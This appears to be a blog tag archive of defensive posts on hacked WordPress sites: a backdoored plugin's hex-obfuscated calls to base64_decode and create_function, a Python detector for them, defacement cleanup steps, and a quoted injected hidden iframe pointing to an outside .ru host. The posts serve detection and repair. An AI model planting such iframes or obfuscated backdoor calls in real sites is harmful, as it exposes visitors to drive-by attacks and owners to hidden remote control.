Tag Archives: hack
If your WordPress site is showing “Buy Accutane Online” in the Google results, it’s because one of the plugins you’re using is not safe. One plugin known for this exploit is the “My Page Order” plugin by geekyweekly. I’d suggest removing the plugin altogether. You’ll notice that the source code is clean if you view it, as the plugin only affects the page when the Google bot is viewing it.

The function is using two strings of hex-escaped character values:

    $unique_id = "\x62\x61s\x65\x36\x34\x5f\x64\x65c\x6f\x64\x65";
    $unique_hash = "\x63\x72e\x61\x74\x65\x5f\x66\x75\x6ec\x74\x69\x6f\x6e";

Those translate into base64_decode and create_function respectively, two functions you don’t want to see in any plugin or theme, as they are usually responsible for maladies. You should also check your server logs for “wxdGrgPB”, as that is the POST/GET variable used to send malicious commands to this script.
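The check described above can be scripted. This is an added example, not code from the post or from the plugin: it resolves PHP hex and octal escapes in double-quoted string literals and reports any that hide one of the two function names, then filters log lines for the “wxdGrgPB” variable. The function names, sample PHP wrapper and log lines are constructed for illustration.

```python
import re

# Function names the post calls out as red flags when hidden in a plugin or theme.
SUSPICIOUS = {"base64_decode", "create_function"}
# A PHP double-quoted string literal, allowing backslash escapes inside it.
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# PHP escapes: backslash-x with 1-2 hex digits, or backslash with 1-3 octal digits.
ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')

def decode_php_escapes(literal: str) -> str:
    """Resolve hex and octal escapes as PHP does in double-quoted strings."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)
    return ESCAPE_RE.sub(repl, literal)

def scan_php_source(source: str):
    """Return (line_no, decoded_name) for each escaped literal hiding a flagged name."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for m in STRING_RE.finditer(line):
            raw = m.group(1)
            decoded = decode_php_escapes(raw)
            # Report only literals that were actually obfuscated with escapes.
            if decoded != raw and decoded.lower() in SUSPICIOUS:
                hits.append((line_no, decoded))
    return hits

def scan_access_log(lines, marker="wxdGrgPB"):
    """Return log lines whose request carries the variable named in the post."""
    return [ln for ln in lines if marker in ln]

# Constructed sample: the two strings from the post plus one harmless literal.
SAMPLE_PHP = r'''<?php
$title = "My Page Order";
$unique_id = "\x62\x61s\x65\x36\x34\x5f\x64\x65c\x6f\x64\x65";
$unique_hash = "\x63\x72e\x61\x74\x65\x5f\x66\x75\x6ec\x74\x69\x6f\x6e";
'''
# Constructed log lines (documentation IP range), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2012:10:00:00 +0000] "GET /?page_id=2 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2012:10:00:05 +0000] "GET /?wxdGrgPB=x HTTP/1.1" 200 20',
]

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_PHP))
    print(scan_access_log(SAMPLE_LOG))
```

POST bodies are normally not written to access logs, so the log filter only catches the variable when it arrives in the query string.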
If you are seeing this code, your website has been hacked:

    ~ Call 911 y0u g0t Hacked by Pak Cyber Army ~ <=Shak=> ~

If your website has been hacked and the pakcyberarmy.net spam is showing up, this is how you can fix it:

This exploit usually only affects the root index file, which may be index.html or index.php. Restore this file to a saved, earlier version, or rename it to something like index.txt or index.bak if you need to start from scratch. You may also want to look at the file-modification time to get some idea of when the attack occurred.

You should check the server logs and look for suspicious FTP activity or unusual HTTP requests, especially ones with GET parameters or POST data. You should also check your .htaccess file for rewrite rules that redirect visitors.

If you have shell access, run this command to see all files changed within the last 24 hours (-mtime counts in days, so -1 matches files modified less than one day ago):

    find ~ -mtime -1

You can change ~ to ~/www or the path to your web root as needed.
I’m getting errors in my log file with “sadeferxaa” in the URL request:

    IP: 220.127.116.11
    Page Requested: /index.php?page=sadeferxaa
    Browser Signature: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)

WordPress was also compromised with the following data injected at the end of some files:

    <html><body><iframe src="http://eftpsid0342943.ru/contacts/s3" width=1 height=1></iframe></body></html>

I’m trying to track down the source of the compromise, please comment if you have a similar experience with this.